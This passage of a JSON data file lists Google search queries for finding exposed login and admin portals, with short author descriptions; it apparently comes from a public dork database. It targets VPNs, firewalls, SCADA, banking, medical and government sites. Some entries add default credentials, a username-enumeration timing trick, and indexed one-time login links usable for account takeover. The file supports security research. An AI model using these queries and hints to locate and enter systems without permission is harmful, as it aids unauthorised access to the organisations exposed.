\"Microsoft Outlook Web Access\" Panels.\nBest Regards.\nRootkit Pentester."}, {"dork": "intitle:\"OneAccess WCF\" Username", "description": "Login screen for the OneAccess routers.\nAuthor: Manuel Mancera (@sinkmanu)"}, {"dork": "inurl:backoffice intitle:login", "description": "# Exploit Title: BackOffice Login Portals\n# Google Dork: inurl:backoffice intitle:login\n# Description: Dork to find login portal access to Backoffice CMS..\n# Date: 01/04/2016\n# Exploit Author: XDarkCoder"}, {"dork": "inurl:9443/vsphere-client", "description": "Google dork Description: inurl:9443/vsphere-client\nGoogle search: inurl:9443/vsphere-client\nDate: 2016-02-04\nAuthor: khajj16\nSummary: The VMware vSphere Web Client is the Web-based application that\nconnects users to the vCenter Server to manage installations and handle\ninventory objects in a vSphere environment."}, {"dork": "inurl:/Remote/logon?ReturnUrl", "description": "inurl:/Remote/logon?ReturnUrl \nThis google dork can access many outdated and vulnerable windows servers out there..\nCreated by Sivabalan ( CYBER GENIUS)"}, {"dork": "inurl:/dynamic/login-simple.html?", "description": "inurl:/dynamic/login-simple.html?\nThis google dork can access many linksys Smart wifi accounts .\nCreated by Sivabalan ( CYBER GENIUS )"}, {"dork": "inurl:https://pma.", "description": "Google dork Description: inurl:https://pma.\nGoogle search: inurl:https://pma.\nDate: 2016-11-04\nAuthor: khajj16\nSummary: phpmyadmin login portals intended to handle the administration of\nMySQL or MariaDB with the use of a web browser."}, {"dork": "inurl:inmotionhosting.com:2096/", "description": "# Title: Webmail login pages\n# Google Dork: inurl:inmotionhosting.com:2096/\n# Date: 04/14/2016\n# Author: Stephanie Jensen (https://twitter.com/Steph_J_)\nSummary\nSearching with omitted results gives you webmail login pages. Some \nsearch results even display login credentials in search result titles."}, {"dork": "inurl:dynamic.php?page=mailbox", "description": "# Exploit Title: Webmail login pages\n# Google Dork: inurl:dynamic.php?page=mailbox\n# Date: 04/14/2016\n# Author: Stephanie Jensen\nSummary\nwebmail login pages - many with obvious usernames in search results. \nLogin attempts seem unlimited."}, {"dork": "inurl:\"/owncloud/index.php\" -github -forum", "description": "Google dork Description: inurl:\"/owncloud/index.php\" -github -forum\nGoogle search: inurl:\"/owncloud/index.php\" -github -forum\nDate: 2016-29-04\nAuthor: khajj16\nSummary: Owncloud login portal."}, {"dork": "inurl:\"/eyeos/index.php\" -github -forum", "description": "Google dork Description: inurl:\"/eyeos/index.php\" -github -forum\nGoogle search: inurl:\"/eyeos/index.php\" -github -forum\nDate: 2016-29-04\nAuthor: khajj16\nSummary: WebOS login portal for EyeOS."}, {"dork": "intitle:\"MODX CMF Manager Login\"", "description": "Searches for MODX login portals, even if admin portal URL is not at usual\nlocation of /manager/\nAuthor: Charles Holtzkampf"}, {"dork": "inurl:/remote/login/ intext:\"please login\"|intext:\"FortiToken clock drift detected\"", "description": "Description : inurl:/remote/login/ intext:\"please login\"|intext:\"FortiToken\nclock drift detected\"\nSearch : inurl:/remote/login/ intext:\"please login\"|intext:\"FortiToken\nclock drift detected\"\nDate: 05-06-2016\nAuthor: Krishna\nSummary:Exposed SSL VPN Login pages for Fortiguard SSL VPN."}, {"dork": "inurl:Dialin/Conference.aspx", "description": "# Exploit Title: Google dork to discover Lync Server 2013\n# Google Dork: inurl:Dialin/Conference.aspx\n# Date: 2016-08-03\n# Exploit Author: @nyxgeek\n# Vendor Homepage: microsoft.com\nThis search reveals Lync Server 2013 dialin login pages. A user \nenumeration\ntiming attack can be performed against these pages. Long response time\nindicates that the username is invalid. Short response time indicates \nthat\nyou have a valid username."}, {"dork": "intitle:Sign In inurl:/adfs/ls/?wa=wsignin1.0", "description": "Description: Exposed Active Directory Federation Services (ADFS or AD FS) User Sign-in Pages\nGoogle search: intitle:Sign In inurl:/adfs/ls/?wa=wsignin1.0\nDork Author: Serhii Pronin"}, {"dork": "inurl:/human.aspx?r=", "description": "Secure ftp server Logins\nHosted by \"moveit\" company\nBig businesses.\nAlso inurl:/human?=arg12\n-Xploit"}, {"dork": "inurl:\"https://vdi\"", "description": "VMware Horizon Logins\nAlso other dorks \ninurl:/portal/webclient/index.html#/warning\ninurl:\"https://mydesktop-\"\ninurl:\"https://view\"\ninurl:\"https://mypc\"\n-Xploit"}, {"dork": "inurl:/web/device/login?lang=1", "description": "name =find h3c web manage login pages\nGoogle dork Description: inurl:/web/device/login?lang=1\nGoogle search: inurl:/web/device/login?lang=1\nAuthor: id_No2015429\nFind h3c web manage login pages.\nSummary: h3c web manage login pages."}, {"dork": "intitle:\"SonicWALL - Authentication\"", "description": "SonicWALL firewall login portals\nGoogle Dork: intitle:\"SonicWALL - Authentication\"\nDate: 2016-11-28\nAuthor: Devendra Singh Solanki"}, {"dork": "intitle:\"Integrated Dell Remote Access Controller 6 - Enterprise\"", "description": "Dell Remote Access Controller 6 - Enterprise Web Login Portals\nGoogle Dork: intitle:\"Integrated Dell Remote Access Controller 6 -\nEnterprise\"\nDate: 2016-11-29\nAuthor: Devendra Singh Solanki"}, {"dork": "intitle:\"Vigor Login Page\"", "description": "Vigor router login panel\nGoogle Dork: intitle:\"Vigor Login Page\"\nDate: 2016-12-01\nAuthor: Devendra Singh Solanki"}, {"dork": "inurl:action=php.login", "description": "#GoogleDork:inurl:action=php.login\n#you can found a different admin page\n#Dork Author: @HACKERHMB"}, {"dork": "intitle:Login \"Login to pfSense\" \"Password\" \"LLC\"", "description": "Google Dork: intitle:Login \"Login to pfSense\" \"Password\" \"LLC\"\n#Title: pfSense firewall administrative login page\n#Author: Simon Gurney\n#Website: blog.synack.co.uk\nAdmin login pages for pfSense firewalls."}, {"dork": "intitle:\"Login - OpenStack Dashboard\" inurl:\"dashboard\"", "description": "Found this: intitle:\"Login - OpenStack Dashboard\" inurl:\"dashboard\"\r\n\r\n\r\n\r\nVer\u00f3nica Ovando (AKA verovan)"}, {"dork": "inurl:\".reset;-.pwd }\" \"~ User\"", "description": "Also here is more.\ninurl:\"/ctl/SendPassword?returnurl=\" \"08\"\ninurl:\"/Login/tabid/Default.aspx?\" \"73\"\n-Where the number is you can put any number you want from 1-1000 or more.\n-Xploit"}, {"dork": "inurl:\"/admin.php?cont=\"", "description": "Finds Radius Manager login pages (mostly HTTP!)\nDxtroyer"}, {"dork": "inurl:\"/SecureAuth1\"", "description": "SecureAuth \nLogins, Password Resets\ninurl:\"/SecureAuth1\" --(Replace number from 1-100)\n-Xploit"}, {"dork": "inurl:/j_security_check;jsessionid=", "description": "Google dork : inurl:/j_security_check;jsessionid=\nDescription : This google dork can access a lot of login pages \nCreated by dekingofcyber ( sivabalan )"}, {"dork": "inurl:\"/fmi/webd\"", "description": "FileMaker WebDirect Logins \nAnother file cloud folder.\n-Xploit"}, {"dork": "inurl:/helpdesk/staff/index.php?", "description": "Google dork to find \" Kayako software-ticketing portal login page\"\nGogle dork :* inurl:/helpdesk/staff/index.php?*\n*Regards,*\n*Dagalti kick*"}, {"dork": "intitle:\"Django site admin\" inurl:admin -site:stackoverflow.com -site:github.com", "description": "Identify admin page for websites built with Python Django framework\r\n\r\nSreeram Sasikumar"}, {"dork": "inurl:\"xamppsecurity.php\"", "description": "inurl:\"xamppsecurity.php\"\r\n\r\nps.: with this dork it is possible to enter several administrative panels of xampp that do not have password for protection.\r\n\r\nAtt.\r\n huehuehuebrbrbr"}, {"dork": "inurl:https://owa", "description": "*Google dork description: *Sites running Outlook Web Application (OWA) and\r\nin extension run e-mail via Microsoft Exchange\r\n\r\n*Google Search: *inurl:https://owa\r\n\r\n*Submitted by:* Alfie_the-infosec_"}, {"dork": "inurl:\"communique_detail.php?id=\"", "description": "*Google Dork Description*:inurl:\"communique_detail.php?id=\"\r\n\r\n-with this dork it is possible to access multiple communique detail login\r\npages of different sites.\r\n-Author: Ashwin Rajeev"}, {"dork": "intitle:\"Panel Administracyjny\"", "description": "*Google Dork : intitle:\"Panel Administracyjny\"*\r\n\r\n*Description : Show admin panel of .pl (Poland) websites. *\r\n*Author: P5N4PPZ*"}, {"dork": "inurl:\"/moodle/login/index.php\"", "description": "Finds Moodle Login pages\r\n\r\nDxtroyer"}, {"dork": "inurl:\"https://mylogin.\"", "description": "Finds login pages, mostly on educational websites\r\n\r\nDxtroyer"}, {"dork": "inurl:\"/libs/granite/core/content/login.html\"", "description": "The following dork will give you the list of AEM Installed server. (Adobe\r\nExperience Manager)\r\ninurl:\"/libs/granite/core/content/login.html\""}, {"dork": "inurl:\"/jde/E1Menu.maf\"", "description": "This dork is to search for public available jd edward ERP portals.\r\n\r\nDork: inurl:\"/jde/E1Menu.maf\"\r\n\r\nAs per Oracle documentation the default username: DEMO and password: DEMO"}, {"dork": "inurl:/login/index.php intitle:CentOS", "description": "inurl:/login/index.php intitle:CentOS\r\n\r\nFinds CentOS Web Panel Login Pages. See http://centos-webpanel.com"}, {"dork": "inurl:/frontend/paper_lantern/index.html", "description": "inurl:/frontend/paper_lantern/index.html\r\n\r\nThis Dork is useful to search and find CPANEL login"}, {"dork": "inurl:\"/forms/frmservlet?config=\" login", "description": "Various login portals and custom applications using Oracle executable forms\r\nservices, to use this dork properly it requires java running in the browser.\r\n\r\nBruno Schmid"}, {"dork": "intitle:tm4web login | logon | account | member | password", "description": "Login portals from web applications using the TM4J(Topic Maps 4 Java) topic\r\nmap engine.\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:Login to CMS Made Simple + inurl:/cmsms", "description": "intitle:Login to CMS Made Simple + inurl:/cmsms\r\n\r\nCMS Made Simple login pages\r\n\r\nManhNho"}, {"dork": "intitle:\"Control Panel\" + emailmarketer", "description": "intitle:\"Control Panel\" + emailmarketer\r\n\r\nEmail Marketer login panel\r\n\r\nManhNho"}, {"dork": "intitle:Control Panel \"Login with your username and password below.\" +\"Email\" +\"Powered by\"", "description": "*What: *Vulnerable Interspire Email Marketer installs and their login pages.\r\n\r\nThe dork from the recently published paper\r\nhttps://security.infoteam.ch/en/blog/posts/from-hacked-client-to-0day-discovery.html\r\n\r\n*By: *edm0nd\r\nhttps://twitter.com/Edmond_Major"}, {"dork": "intitle:\"Please login\" \"username\" \"password\"", "description": "Many login portals\r\n\r\n\r\nBruno Schmid"}, {"dork": "\"username\" \"password\" intitle:\"login here\"", "description": "More login portals\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"form_id\" login username password", "description": "Login portals\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:access your account\" login", "description": "Login and admin portals\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:your access id is\" login -youtube", "description": "Login portals and sometimes instructions how to get or reset user access IDs\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"private login\" username -github", "description": "Login portals to private/exclusive area\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:intranet/login login", "description": "Login portals to intranets\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"partners login\"", "description": "Login portals\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"login.php?referer=profile.php\"", "description": "Login portals from Coppermine Photo Gallery\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"login credit\" \"login\"", "description": "Login portals mainly from finance/banking websites\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"login form\" \"powered by\" -tutorial", "description": "Many login portals from several frameworks.\r\nAlso try intitle:\"login form\" \"powered by\" | \"CMS\" -tutorial\r\n\r\n\r\nBruno Schmid"}, {"dork": "\"department\" | \"agency\" | \"government\" \"intitle:\"login form\" -youtube -template", "description": "Governments, agencies and politic related login portals.\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "\"service\" | \"military\" | \"federal\" \"intitle:\"login form\" -youtube -template -stackoverflow", "description": "Law, federal departments and military and service related login portals.\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "\"login\" \"secure\" \"intitle:\"online banking\" -youtube -template -stackoverflow -stackexchange", "description": "Online banking login portals...\r\n\r\nalso try:\r\n\"login\" \"secure\" \"intitle:\"private banking\" -youtube -template\r\n-stackoverflow -stackexchange\r\n\r\n\"login\" \"secure\" \"intitle:\"investment banking\" -youtube -template\r\n-stackoverflow -stackexchange\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"login\" | intitle:\"sign in\" \"member\" \"private\" \"admin\" \"club\" -stackoverflow -github -youtube", "description": "More login portals\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "intitle:\"login\" | intitle:\"hospital\" \"patient\" \"clinic\" \"admin\" \"medical\" \"login\" -stackoverflow -github -youtube", "description": "Medical related login portals\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "\"login\" intitle:\"scada login\"", "description": "Scada login portals\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"/forgotpwd.jspx\"", "description": "Oracle Identity Manager password Reset pages. Sometimes it will auto login\r\nas anonymous user by default.\r\n\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"ssologin/\" -github.com", "description": "Pages containing login portals.\r\n\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"cmd=auth?\" -github -stackoverflow -gitlab", "description": "Many login portals\r\n\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"/initiatesso?providerid=\" -github.com", "description": "Pages containing login portals with high probability to be an Oracle Access\r\nManager portal typical containing \"initiatesso?providerid\" in the url\r\n\r\n\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "\"Oracle peoplesoft sign in\" inurl:\"cmd=login?\" -github -stackoverflow -gitlab", "description": "Oracle PeopleSoft login portals\r\n\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"/startSSO.ping?\" -stackoverflow.com", "description": "Pages containing Ping Identity\u00ae's and PingFederate\u00ae login portals mainly\r\nused by high profiled companies\r\n\r\n\r\n\r\nBruno Schmid"}, {"dork": "inurl:\"/Admin/Login?ReturnUrl=\" -github.com -gitlab.com", "description": "Admin login portals\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"login\" inurl:\"account/auth\" -github -gitlab -stackoverflow", "description": "Login portals... Most of them use ASPT.NET technology.\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://www.linkedin.com/in/schmidbruno"}, {"dork": "\"login\" \"adp login\" -adplogin.us -adplogin.org -adplogin.net", "description": "Login portals from ADP Login which is mainly used in the following fields:\r\n\r\n - Human Capital Management\r\n - Payroll Services\r\n - Talent Management\r\n - HR Management\r\n - Affordable Care Act\r\n - Benefits Administration\r\n - Time & Attendance\r\n - HR Business Process Outsourcing (HR BPO)\r\n - Professional Employer Organization (PEO)\r\n - Retirement Plans\r\n - Insurance Plans\r\n - Tax & Compliance\r\n - Payment Solutions\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:default.aspx?ReturnUrl=/spssmr -stackoverflow -youtube.com -github", "description": "IBM\u00ae SPSS\u00ae Data Collection Interviewer Server Administration login portals\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"/SAMLLogin/\" -github", "description": "Security Assertion Markup Language (SAML) Login portals\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"BMC Remedy Mid Tier\" \"login\"", "description": "BMC Remedy login portals\r\n\r\n\r\n\r\n\r\nBruno Schmid\r\n\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:/mailscanner/login.php", "description": "Google Dork :: inurl:/mailscanner/login.php to get email filter \r\nappliance login page (MailWatch Login)\r\n\r\n\r\nNisankh Acharjya"}, {"dork": "intitle:\"Open Source HRMS\" intext:\"powered by\"", "description": "This dork will show Human Resource Management System Login Page\r\n\r\nintitle:\"Open Source HRMS\" intext:\"powered by\"\r\n\r\n\r\nAvles Nas"}, {"dork": "intitle:\"Login\" inurl:\"/itim/self\" | inurl:\"/itim/ui\" -ibm.com", "description": "Pages using \"IBM Tivoli Identity Manager\" as login portals.\r\n\r\nVaibhav Dhote"}, {"dork": "intext:\"this login can be used only once\" inurl:user intitle:\"reset password\"", "description": "This dork can hunt out vulnerable drupal websites with their password reset\r\npages of various accounts for account takeover.\r\n\r\n*Description*:\r\n\r\nDrupal users using PRLP (Password Reset Landing Page) module. When this\r\nmodule is installed, If a user requests a new password, the requested user\r\nwill be mailed with a one time login link. These link comes with a expiry\r\ndate and time. This one time login link enabled the users to change their\r\npasswords without asking for current password and also let them to login to\r\ntheir account without changing their password.\r\n\r\nAccidentally, these One Time Login Links are indexed by Search Engines and\r\nthis allowed any user to login as other user and change their passwords\r\nusing this One Time Login Link.\r\n\r\n*Dork*:\r\n\r\nintext:\u201dthis login can be used only once\" inurl:user intitle:\"reset password\"\r\n\r\n*Category*: Pages Containing Login Portals\r\n\r\n*Date*: 11-05-2018\r\n\r\n\r\nThe Infected Drake (@_tID)"}, {"dork": "intitle:login laboratory | \"nuclear\" | physics \"password\" authentication", "description": "Login portals of specific interest\r\n\r\nFor other fields also try:\r\n\r\nintitle:login institute of | national | center of | embassy | federation |\r\ndeputy \"password\"\r\n\r\nintitle:login medicine | genetics | microbiology | cancer | neurologic\r\n\"password\"\r\n\r\nintitle:login democratic | nationalist | republican | socialist | federal\r\n\"password\"\r\n\r\nintitle:login aviatics | aviation | aeronautic | naval \"password\"\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"user_login/\" bitcoin | crypto | wallet", "description": "Login portals related to cryptocurrency wallets and cryptocurrency excange\r\nweb apps\r\n\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"Netgear\u2122 - NETGEAR Configuration Manager Login\"", "description": "intitle:\"Netgear\u2122 - NETGEAR Configuration Manager Login\"\r\n\r\nLogin page.\r\n\r\nManhNho"}, {"dork": "allintitle: \"Flexi Press System\"", "description": "This dork will show login portal: Flexi Press System\r\n\r\nmil1200"}, {"dork": "intext:2001.-.2018.umbraco.org ext:aspx", "description": "Identify admin login portals for websites built with Umbraco CMS.\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "inurl:/CMSPages/logon ext:aspx", "description": "Retrieve Administration logins of websites using Kentico CMS.\r\n\r\ninurl:/cmsdesk intitle:CMS.Login\r\n\r\ninurl:/CMSPages/logon ext:aspx intitle:CMS.Login\r\n\r\nThese two dorks also retrieve more logins of website which use Kentico CMS.\r\n\r\nAuthor : Raj Kiran P"}, {"dork": "inurl:/index.php/login intext:Concrete.CMS", "description": "Identify login portals of website that use Concrete CMS.\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "\"Powered by Open Source Chat Platform Rocket.Chat.\"", "description": "This Google Dork displays open Login Portals for RocketChat.\r\n\r\nFound by Lewis, @LewisBugBounty // fifteen@riseup.net."}, {"dork": "inurl:'/blog/Account/login.aspx'", "description": "Dorks about BlogEngine.NET login panel\r\n\r\nAuthor: Brain Reflow"}, {"dork": "inurl:\"/logon.aspx?ReturnUrl=\"", "description": "Several login portals\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:login.jsp?permissionViolation", "description": "JIRA login portals\r\n\r\nAlso try inurl:user_role=ADMIN\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:Connect.with.Finalsite intitle:admin -facebook", "description": "Admin login pages of website using Finalsite CMS.\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "inurl:/contao/main ext:php -community -github", "description": "Retrieve login page of website that use Contao CMS.\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "inurl:/sitefinity intext:Copyright.(c)*Telerik. Site.Finity", "description": "This dork retrieves all the login page of website that use Sitefinity CMS.\r\n\r\n\r\ninurl:/sitefinity/login intext:Login.to.manage.the.site.\r\n\r\nThe above dork also retrieves more login page of website that use\r\nSitefinity CMS.\r\n\r\n\r\nAuthor: Abhinand Das A"}, {"dork": "inurl:/admin intitle:Pulse.CMS -pulsecms.com", "description": "Retrieve all admin page of websites build using Pulse CMS.\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "intext:Omeka*Username Powered.by.Omeka inurl:admin -github -omeka.org", "description": "Retrieve all admin login page of websites that use Omeka CMS.\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "intitle:Wagtail.-.Sign in intext:Javascript.is.required.to.use.Wagtail", "description": "Retrieve all admin page of website that use Wagtail CMS.\r\n\r\n\r\nMore: inurl:admin intitle:wagtail -wagtail.io -stackoverflow -github\r\n\r\n\r\nAuthor: Raj Kiran P"}, {"dork": "\"2004 - 2018 iboss, Inc. All rights reserved.\"", "description": "Find iBoss login portals. \r\n\r\n~ CrimsonTorso"}, {"dork": "intitle:\"MyWebSQL\" + \"User ID: Password:\"", "description": "intitle:\"MyWebSQL\" + \"User ID: Password:\"\r\n\r\nMyWebSQL login pages\r\n\r\nManhNho"}, {"dork": "intitle:\"SSL VPN Service\" + intext:\"Your system administrator provided the following information to help understand and remedy the security conditions:\"", "description": "Show Cisco asa login web page which maybe contain new Cisco's CVEs\r\n\r\nManhNho"}, {"dork": "filetype:png | \"proportal\"", "description": "Find ProPortal login portals. \r\n\r\nalso: \"Version 18.2.0\" \"ProPortal\"\r\n\r\n~ CrimsonTorso"}, {"dork": "frmLogin", "description": "Find websites using frmLogin login portals. \r\n\r\n~CrimsonTorso"}, {"dork": "\"webkactus\"", "description": "Scrape websites using webkactus software login portals.\r\n\r\n~ CrimsonTorso"}, {"dork": "\"CCCLogin.aspx\"", "description": "Find direct login pages using ProPortal.\r\n\r\n~ CrimsonTorso"}, {"dork": "\"PaperCut Login\"", "description": "Find login portals for PaperCut printing software.\r\n\r\n~CrimsonTorso"}, {"dork": "\"Powered byPlanet eStream\"", "description": "Find websites using byPlanet eStream video software login portals.\r\n\r\n~ CrimsonTorso"}, {"dork": "inurl:login.jsp intitle:\"admin\"", "description": "Dork : inurl:login.jsp intitle:\"admin\"\r\n\r\nDescription : This Dork id Used to find the Admin Login Portal of a Web Page\r\nAuthor: Lino Thomas"}, {"dork": "intitle:\"manager area\" password -stackoverflow.com", "description": "Login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"Copyright Metislab\" password", "description": "Metislab login portals\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "nd=m_fundraising_detail \"login here\"", "description": "Some fund raising related login portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"/jira/login.jsp\" intitle:\"JIRA login\"", "description": "inurl:\"/jira/login.jsp\" intitle:\"JIRA login\"\r\n\r\nJira login pages\r\n\r\nManhNho"}, {"dork": "inurl:secure/dashboard jspa", "description": "Access to JIRA dashboards login portals and sometimes direct access to\r\nprojects dashboard itself.\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"Thank you for using BIG-IP.\"", "description": "BIG-IP F5 devices footprinting, it gives you login portals and errorcodes\r\nfor F5\r\n\r\nAlso try:\r\ninurl:my.logout.php3?\r\ninurl:\"/my.policy\" big-ip\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:/usersignin?", "description": "Login portals\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"phpVirtualBox - VirtualBox Web Console\"", "description": "# Exploit Title: Find phpVirtualBox login portail\r\n\r\n# Google Dork: intitle:\"phpVirtualBox - VirtualBox Web Console\"\r\n\r\n# Date: 10/09/2018\r\n\r\n# Exploit Author: Hamoji\r\n\r\n# Vendor Homepage: https://github.com/phpvirtualbox/phpvirtualbox\r\n\r\n# Version: 4.3-3, 5.0-5"}, {"dork": "inurl:/banking.jsp?fldsegment=", "description": "[*] Description: Finds The Internet Banking Portals Which Are Running on\r\nOracle Flex-cube Core Banking Solutions.\r\n\r\n[*] Google Dork: inurl:/banking.jsp?fldsegment=\r\n\r\n[*] Author: Osman Arif"}, {"dork": "inurl:/INALogin.jsp", "description": "[*] Description: Finds The Internet Banking Backend Administrator Portals\r\nRunning on Oracle Flex-cube Core Banking Solutions.\r\n\r\n[*] Google Dork: inurl:/INALogin.jsp\r\n\r\n[*] Author: Osman Arif"}, {"dork": "intitle:Login inurl:login.php intext:admin/admin", "description": "intitle:Login inurl:login.php intext:admin/admin\r\n\r\n\r\nThis Google Dork discovers login portals with weak default passwords.\r\n\r\n\r\n- Gionathan \"John\" Reale (https://www.exploit-db.com/author/?a=9609)"}, {"dork": "intitle:login \"recruiter\" | \"employer\" | \"candidate\"", "description": "Recruitment and employers login portals.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"authentication\" intranet password login inurl:account ext:(doc | pdf | xls| psw | ppt | pps | xml | txt | ps | rtf | odt | sxw | xlsx | docx | mail)", "description": "A mix of login portals and passwords\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:login intext:\"reset your password\"", "description": "Information on how login portals reset their users/customers passwords and\r\nso on.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schm"}, {"dork": "intext:(username | user | email | sign on | login | auth) admin dashboard | panel -stackoverflow", "description": "A lot of login portals.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:login.do? | shoplogin.do | adminlogin", "description": "More login portals...\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:\"Default+Administrator+View\"", "description": "Some login portals, somtimes obsolete Verizon Java based applications\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inur:\"arsys/forms\" | \"arsys/shared\" | \"/arsys/home\"", "description": "BMC remedy AR System Server portals\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"ProQuest provides subscription access to numerous premium technical journals, dissertations and other information databases.\"", "description": "Find login portals on websites using ProQuest.\r\n\r\n~ CrimsonTorso"}, {"dork": "intitle:\"Log in - WhatsUp Gold\"", "description": "Description: This google dork can expose the landing log in page for\r\nWhatsUp Gold network monitoring tool.\r\nHere's the published CVE link for WhatsUp Gold:\r\nhttps://www.cvedetails.com/vulnerability-list/vendor_id-193/product_id-3865/Ipswitch-Whatsup-Gold.html\r\n\r\nAuthor: Zulfikar Azhari"}, {"dork": "intitle:\"OAuth Server Login\"", "description": "intitle:\"OAuth Server Login\"\r\n\r\nLogin page\r\n\r\nManhNho"}, {"dork": "inurl:\"/saml2?SAMLRequest=\"", "description": "Login portals using SAML\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n\r\n@brulliant"}, {"dork": "inurl:\"/phpsqlitecms/cms/index.php\"", "description": "phpsqlitecms login panel\r\n\r\nManhNho"}, {"dork": "\"vpnssl\"", "description": "I found the following dork by typing \"vpnssl\" on Google. It contains logins\r\nportals containing vpnssl companies access."}, {"dork": "inurl:/config/authentication_page.htm", "description": "Cisco Switch Configuration Utility\r\nManhNho"}, {"dork": "intext:\"Type in Username and Password, then click Ok\" intitle:\"log in\"", "description": "Web login panel\r\n\r\nManhNho"}, {"dork": "\"inurl:\"Umbraco/#/login\" site:*edu\"", "description": "Find login portals for .edu websites using Umbraco web software.\r\n\r\n\r\nFind login portals for .gov websites using Umbraco web software.\r\n\"inurl:\"Umbraco/#/login\" site:*gov\"\r\n\r\n~ CrimsonTorso"}, {"dork": "\"login\":", "description": "\"login\":\r\n\r\nThis Google Dork discovers thousands of login portals.\r\n\r\n\r\n\r\n- Gionathan \"John\" Reale"}, {"dork": "inurl:_cpanel/forgotpwd", "description": "inurl:_cpanel/forgotpwd\r\n\r\ndiscover cpanel login portals for Neto eCommerce suite users.\r\n\r\n~ B15mu7h"}, {"dork": "inurl:webman/index.cgi", "description": "inurl:webman/index.cgi\r\n\r\nNAS DiskStation Login portals\r\n\r\n~ B15mu7h"}, {"dork": "\"Example: jane.citizen1\"", "description": "\"Example: jane.citizen1\"\r\n\r\nLogin portals\r\n\r\n~ B15mu7h"}, {"dork": "intext:\"EQ1PCI\"", "description": "Finds Login portals\r\n\r\n~ Kaligulah"}, {"dork": "inurl:admin.php inurl:admin ext:php", "description": "Admin Login Page !!(inurl:admin.php inurl:admin ext:php)\r\n\r\nDork by T3jv1l"}, {"dork": "inurl:/sap/bc/bsp", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ SAP NetWeaver ABAP ++\r\n\r\ninurl:/sap/bc/bsp\r\n\r\n\u2043\tFinds SAP login portals\r\n\u2043\tFinds SAP server entry points\r\n\u2043\tFinds SAP servers of large companies\r\n\u2043\t18 Vulnerabilities on Exploit DB available for SAP NetWeaver at the time of writing:\r\n\u2043 https://www.exploit-db.com/exploits/44647 \r\n\u2043 https://www.exploit-db.com/exploits/44292 \r\n\u2043 https://www.exploit-db.com/exploits/40816 \r\n\u2043\t\u2026\u2026. just search SAP NetWeaver and the desired Version\r\n\u2043\t66.100 results at the time of writing\r\n\r\nDISCLAIMER:\r\nThe vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system\r\nSome of these are sourced from Onapsis, ERPscan and Rapid7 all have great sources on SAP testing"}, {"dork": "inurl:/irj/portal", "description": "AUTHOR: FlyingFrog\r\nTwitter: 